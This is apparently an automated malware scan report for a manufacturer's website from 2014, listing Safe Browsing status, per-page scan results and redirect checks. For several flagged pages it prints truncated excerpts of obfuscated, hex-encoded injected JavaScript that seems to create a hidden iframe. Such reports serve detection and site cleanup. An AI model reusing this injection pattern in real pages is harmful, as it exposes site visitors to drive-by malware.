Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rksindustries.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rksindustries.net/ | 200 OK Content-Length: 12111 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pvglbu="s"+"p"+"li"+"t";abb=window;amfp="dy";cmwx=document;yqdern="0x";ycr=(5-3-1);try{++(cmwx.body)}catch(zzuzq){rbrva=false;try{}catch(szail){rbrva=21;} if(1){rgzr="17:5d:6c:65:5a:6b:60:66:65:17:6c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6c:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32 Antivirus reports:
| ||
http://rksindustries.net/js/jquery-1.3.2.min.js | 200 OK Content-Length: 56590 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document Antivirus reports:
| ||
http://rksindustries.net/js/jquery.pngFix.js | 200 OK Content-Length: 11517 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { jQuery.fn.pngFix = function(settings) { settings = jQuery.extend({ blankgif: 'blank.gif' }, settings); var ie55 = (navigator.appName == "Microsoft Internet Explorer" && parseInt(navigator.appVersion) == 4 && navigator.appVersion.indexOf("MSIE 5.5") != -1); var ie6 = (navigator.appName == "Microsoft Internet Explorer" && parseInt(navigator.appVersion) == 4 && navigator.appVersion.indexOf("MSIE 6.0") != -1); if (jQu /*/81a338*/ Antivirus reports:
| ||
http://rksindustries.net/index.html | 200 OK Content-Length: 12111 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pvglbu="s"+"p"+"li"+"t";abb=window;amfp="dy";cmwx=document;yqdern="0x";ycr=(5-3-1);try{++(cmwx.body)}catch(zzuzq){rbrva=false;try{}catch(szail){rbrva=21;} if(1){rgzr="17:5d:6c:65:5a:6b:60:66:65:17:6c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6c:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32 Antivirus reports:
| ||
http://rksindustries.net/who-we-are.html | 200 OK Content-Length: 4096 Content-Type: text/html | clean |
http://rksindustries.net/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://rksindustries.net/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://rksindustries.net/manufacturing-clamps.html | 200 OK Content-Length: 12115 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pvglbu="s"+"p"+"li"+"t";abb=window;amfp="dy";cmwx=document;yqdern="0x";ycr=(5-3-1);try{++(cmwx.body)}catch(zzuzq){rbrva=false;try{}catch(szail){rbrva=21;} if(1){rgzr="17:5d:6c:65:5a:6b:60:66:65:17:6c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6c:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32 Antivirus reports:
| ||
http://rksindustries.net/contact-rksindustries-clamps-manufacturer.php | 200 OK Content-Length: 8306 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rksindustries.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 Jun 2014 12:14:03 GMT
Accept-Ranges: bytes
Server: nginx/1.6.0
Content-Length: 12111
Content-Type: text/html
Last-Modified: Tue, 03 Sep 2013 11:01:02 GMT
...12111 bytes of data.
GET / HTTP/1.1
Host: rksindustries.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 Jun 2014 12:14:03 GMT
Accept-Ranges: bytes
Server: nginx/1.6.0
Content-Length: 12111
Content-Type: text/html
Last-Modified: Tue, 03 Sep 2013 11:01:02 GMT
...12111 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rksindustries.net
Referer: http://www.google.com/search?q=rksindustries.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rksindustries.net
Referer: http://www.google.com/search?q=rksindustries.net
Result:
The result is similar to the first query. There are no suspicious redirects found.